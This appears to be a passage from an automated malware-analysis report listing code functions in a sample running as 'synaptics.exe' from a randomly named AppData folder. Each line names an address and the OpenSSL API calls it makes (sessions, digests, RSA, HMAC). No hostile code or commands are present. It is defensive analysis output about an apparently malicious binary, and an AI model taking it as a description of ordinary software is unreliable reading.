                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84150A EVP_PKEY_free,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,EVP_PKEY_size,EVP_MD_CTX_new,EVP_DigestVerifyInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestVerify,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_free,27_2_6F84150A
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841249 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,27_2_6F841249
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F89C280 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,27_2_6F89C280
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84E2A0 CRYPTO_malloc,COMP_expand_block,27_2_6F84E2A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88A2B0 EVP_MD_CTX_new,X509_get0_pubkey,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_size,EVP_DigestVerifyInit,EVP_PKEY_id,CRYPTO_malloc,BUF_reverse,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestVerifyFinal,EVP_DigestVerify,BIO_free,EVP_MD_CTX_free,CRYPTO_free,27_2_6F88A2B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F876230 SSL_CTX_ct_is_enabled,CRYPTO_realloc,27_2_6F876230
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86A250 BIO_s_file,BIO_new,BIO_ctrl,PEM_read_bio,strncmp,strncmp,strncmp,CRYPTO_realloc,memmove,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,SSL_CTX_use_serverinfo_ex,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,27_2_6F86A250
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86C180 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,SSL_SESSION_free,27_2_6F86C180
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841587 CRYPTO_free,27_2_6F841587
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8801B0 memset,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,27_2_6F8801B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8421D8 EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,EVP_DigestSign,BUF_reverse,CRYPTO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_MD_CTX_free,27_2_6F8421D8
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85A1E0 CRYPTO_THREAD_run_once,27_2_6F85A1E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8981E0 CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,27_2_6F8981E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8417BC CRYPTO_free,CRYPTO_strndup,CRYPTO_free,SSL_CIPHER_find,SSL_SESSION_new,SSL_SESSION_set1_master_key,SSL_SESSION_set_cipher,SSL_SESSION_set_protocol_version,OPENSSL_cleanse,SSL_CTX_remove_session,SSL_SESSION_free,_time64,SSL_SESSION_free,memmove,SSL_SESSION_free,OPENSSL_cleanse,SSL_SESSION_free,OPENSSL_cleanse,EVP_MD_size,SSL_SESSION_free,SSL_SESSION_free,27_2_6F8417BC
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F842013 EVP_PKEY_get1_tls_encodedpoint,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,27_2_6F842013
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F852090 CRYPTO_clear_free,27_2_6F852090
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86C0B0 CRYPTO_THREAD_write_lock,OPENSSL_LH_get_down_load,OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,27_2_6F86C0B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8420B3 memmove,CRYPTO_malloc,SRP_Calc_A_param,27_2_6F8420B3
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88E0D0 SSL_client_version,SSL_client_version,CRYPTO_memcmp,27_2_6F88E0D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85A020 COMP_get_type,CRYPTO_mem_ctrl,CRYPTO_malloc,CRYPTO_mem_ctrl,ERR_put_error,OPENSSL_sk_find,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,OPENSSL_sk_push,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,27_2_6F85A020
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F848050 CRYPTO_zalloc,ERR_put_error,27_2_6F848050
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F87E059 CRYPTO_malloc,27_2_6F87E059
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86A070 CRYPTO_malloc,memmove,SSL_CTX_use_serverinfo_ex,CRYPTO_free,CRYPTO_realloc,memmove,ERR_put_error,ERR_put_error,27_2_6F86A070
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F882070 CRYPTO_free,CRYPTO_free,27_2_6F882070
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F869F80 CRYPTO_malloc,ERR_put_error,memmove,SSL_CTX_use_serverinfo_ex,CRYPTO_free,ERR_put_error,27_2_6F869F80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F842365 CRYPTO_malloc,ERR_put_error,memmove,memmove,CRYPTO_clear_free,27_2_6F842365
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F891FC0 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,OPENSSL_sk_num,CRYPTO_free,OPENSSL_sk_value,X509_get0_pubkey,SSL_SESSION_free,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,X509_free,OPENSSL_sk_pop_free,27_2_6F891FC0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F861FD0 SSL_in_init,SSL_in_before,SSL_new,SSL_get_session,SSL_set_session,SSL_set_session_id_context,SSL_free,SSL_set_session_id_context,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_put_error,SSL_free,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,SSL_set_accept_state,SSL_set_connect_state,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,27_2_6F861FD0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F871FE0 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,27_2_6F871FE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F843FF5 BIO_get_data,BIO_get_shutdown,SSL_shutdown,BIO_get_init,SSL_free,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_set_data,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,SSL_get_rbio,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,27_2_6F843FF5
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F863F30 ERR_put_error,ERR_put_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,SSL_free,ERR_put_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,SSL_set_default_read_buffer_len,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memmove,SSL_clear,CRYPTO_new_ex_data,SSL_set_ct_validation_callback,27_2_6F863F30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F847F40 CRYPTO_free,27_2_6F847F40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86DF60 CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,SSL_SESSION_free,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,27_2_6F86DF60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85FE80 ERR_put_error,OPENSSL_init_ssl,SSL_get_ex_data_X509_STORE_CTX_idx,ERR_put_error,ERR_put_error,SSL_CTX_free,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new,SSL_CTX_set_ciphersuites,OPENSSL_sk_num,X509_VERIFY_PARAM_new,EVP_get_digestbyname,EVP_get_digestbyname,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,SSL_COMP_get_compression_methods,RAND_bytes,RAND_priv_bytes,RAND_priv_bytes,RAND_priv_bytes,SSL_CTX_SRP_CTX_init,27_2_6F85FE80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F897EB0 CRYPTO_free,CRYPTO_malloc,ERR_put_error,27_2_6F897EB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841FB9 strncmp,strncmp,strncmp,strncmp,strncmp,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_put_error,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_free,27_2_6F841FB9
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F891E00 BN_bin2bn,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,27_2_6F891E00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F871E20 CRYPTO_free,CRYPTO_memdup,27_2_6F871E20
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F847E40 CRYPTO_free,27_2_6F847E40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F847E60 CRYPTO_malloc,ERR_put_error,27_2_6F847E60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F849E70 CRYPTO_free,27_2_6F849E70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86BE70 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,SSL_SESSION_free,OPENSSL_LH_retrieve,SSL_SESSION_free,CRYPTO_THREAD_unlock,SSL_CTX_ctrl,SSL_CTX_ctrl,SSL_CTX_ctrl,OPENSSL_LH_retrieve,OPENSSL_LH_delete,SSL_SESSION_free,SSL_CTX_ctrl,SSL_CTX_ctrl,CRYPTO_THREAD_unlock,27_2_6F86BE70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85DD80 CRYPTO_strdup,CRYPTO_free,27_2_6F85DD80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F87FDE0 X509_get0_pubkey,EVP_PKEY_CTX_new,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,27_2_6F87FDE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F89BDE0 memset,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset,27_2_6F89BDE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F89BD00 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset,27_2_6F89BD00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85FD50 CRYPTO_get_ex_data,27_2_6F85FD50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86FD50 CRYPTO_free,27_2_6F86FD50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F847D60 CRYPTO_zalloc,ERR_put_error,CRYPTO_free,27_2_6F847D60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85DD60 CRYPTO_zalloc,27_2_6F85DD60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F87FCA0 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,27_2_6F87FCA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85DCE0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,27_2_6F85DCE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85BCE0 CRYPTO_zalloc,ERR_put_error,CRYPTO_free,27_2_6F85BCE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F863C40 memmove,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,27_2_6F863C40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F847C70 CRYPTO_free,27_2_6F847C70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86FB80 CRYPTO_free,27_2_6F86FB80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8410AF EVP_CIPHER_CTX_free,CRYPTO_clear_free,27_2_6F8410AF
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F855BD0 CRYPTO_malloc,memset,memmove,memmove,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,27_2_6F855BD0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F865BE0 ERR_put_error,CRYPTO_free,CRYPTO_strdup,27_2_6F865BE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F871BE0 CRYPTO_memcmp,27_2_6F871BE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F885BE0 CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F885BE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F89BB00 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset,27_2_6F89BB00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86FB20 CRYPTO_free,27_2_6F86FB20
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841550 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F841550
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841767 CRYPTO_malloc,memmove,27_2_6F841767
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F87FA88 ENGINE_load_ssl_client_cert,CRYPTO_clear_free,27_2_6F87FA88
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86FA10 CRYPTO_free,CRYPTO_free,27_2_6F86FA10
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8420DB CRYPTO_strdup,27_2_6F8420DB
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84121C CRYPTO_free,27_2_6F84121C
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F891A30 EVP_PKEY_get0_RSA,RSA_size,RSA_size,CRYPTO_malloc,RAND_priv_bytes,RSA_private_decrypt,CRYPTO_free,27_2_6F891A30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88BA60 i2d_SSL_SESSION,CRYPTO_malloc,EVP_CIPHER_CTX_new,HMAC_CTX_new,i2d_SSL_SESSION,d2i_SSL_SESSION,i2d_SSL_SESSION,i2d_SSL_SESSION,SSL_SESSION_free,SSL_SESSION_free,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_CIPHER_CTX_iv_length,EVP_aes_256_cbc,EVP_CIPHER_iv_length,RAND_bytes,EVP_EncryptInit_ex,EVP_sha256,HMAC_Init_ex,EVP_EncryptUpdate,EVP_EncryptFinal,HMAC_Update,HMAC_Final,SSL_SESSION_free,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,27_2_6F88BA60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85FA70 X509_VERIFY_PARAM_free,CRYPTO_free,CRYPTO_free,SSL_CTX_flush_sessions,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,SSL_CTX_SRP_CTX_free,ENGINE_finish,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,CRYPTO_THREAD_lock_free,CRYPTO_free,27_2_6F85FA70
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86F980 CRYPTO_free,27_2_6F86F980
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F857990 CRYPTO_THREAD_run_once,27_2_6F857990
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8479B0 CRYPTO_zalloc,ERR_put_error,27_2_6F8479B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8819C0 CRYPTO_malloc,27_2_6F8819C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841460 memmove,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,SSL_CTX_add_session,SSL_SESSION_free,_time64,SSL_CTX_remove_session,SSL_SESSION_free,27_2_6F841460
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88F900 SSL_get_options,OPENSSL_sk_num,OPENSSL_sk_value,SSL_CIPHER_get_id,SSL_CIPHER_get_id,OPENSSL_sk_num,SSL_get_ciphers,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memmove,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,SSL_client_version,SSL_client_version,CRYPTO_memcmp,SSL_get_ciphers,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,27_2_6F88F900
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841CA8 CRYPTO_zalloc,ERR_put_error,27_2_6F841CA8
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F881890 CRYPTO_malloc,27_2_6F881890
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F875898 CRYPTO_free,CRYPTO_malloc,27_2_6F875898
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8858A0 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F8858A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841212 CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,27_2_6F841212
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85F810 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error,27_2_6F85F810
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88B810 CRYPTO_free,CRYPTO_strndup,27_2_6F88B810
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F855840 EVP_PKEY_CTX_new,EVP_PKEY_derive_init,EVP_PKEY_derive_set_peer,EVP_PKEY_derive,CRYPTO_malloc,EVP_PKEY_derive,CRYPTO_clear_free,EVP_PKEY_CTX_free,27_2_6F855840
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F86F850 CRYPTO_free,27_2_6F86F850
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8997F0 HMAC_CTX_new,EVP_CIPHER_CTX_new,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,EVP_DecryptInit_ex,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,d2i_SSL_SESSION,CRYPTO_free,SSL_SESSION_free,memmove,ERR_clear_error,CRYPTO_free,SSL_SESSION_free,SSL_SESSION_free,27_2_6F8997F0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841618 ERR_put_error,EVP_PKEY_new,EVP_PKEY_set1_DH,EVP_PKEY_free,EVP_PKEY_security_bits,ERR_put_error,EVP_PKEY_free,EVP_PKEY_free,EC_KEY_get0_group,EC_GROUP_get_curve_name,CRYPTO_free,CRYPTO_strdup,CRYPTO_free,27_2_6F841618
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85D730 SSL_CTX_use_certificate_chain_file,SSL_use_certificate_chain_file,CRYPTO_free,CRYPTO_strdup,27_2_6F85D730
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F881740 EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free,27_2_6F881740
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F891770 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,27_2_6F891770
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8596D0 CRYPTO_malloc,ERR_put_error,BIO_snprintf,27_2_6F8596D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8876D0 CRYPTO_malloc,memmove,27_2_6F8876D0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F85F6E0 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error,27_2_6F85F6E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F88B600 CRYPTO_free,CRYPTO_memdup,27_2_6F88B600
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F885610 CRYPTO_malloc,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,CRYPTO_free,CRYPTO_free,27_2_6F885610
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8414F1 EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free,memmove,CRYPTO_free,CRYPTO_free,27_2_6F8414F1
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F855660 CRYPTO_free,CRYPTO_memdup,27_2_6F855660
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F853590 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,27_2_6F853590
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8855A0 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,27_2_6F8855A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841A14 CRYPTO_free,27_2_6F841A14
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F84122B OPENSSL_init_ssl,CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,SSL_get_default_timeout,SSL_SESSION_free,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memmove,27_2_6F84122B
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F859510 CRYPTO_get_ex_new_index,27_2_6F859510
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F877530 CRYPTO_free,CRYPTO_strndup,27_2_6F877530
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F841041 CRYPTO_zalloc,ERR_put_error,27_2_6F841041
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F859550 i2d_X509_NAME,i2d_X509_NAME,CRYPTO_free,CRYPTO_free,27_2_6F859550
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F847480 CRYPTO_free,27_2_6F847480
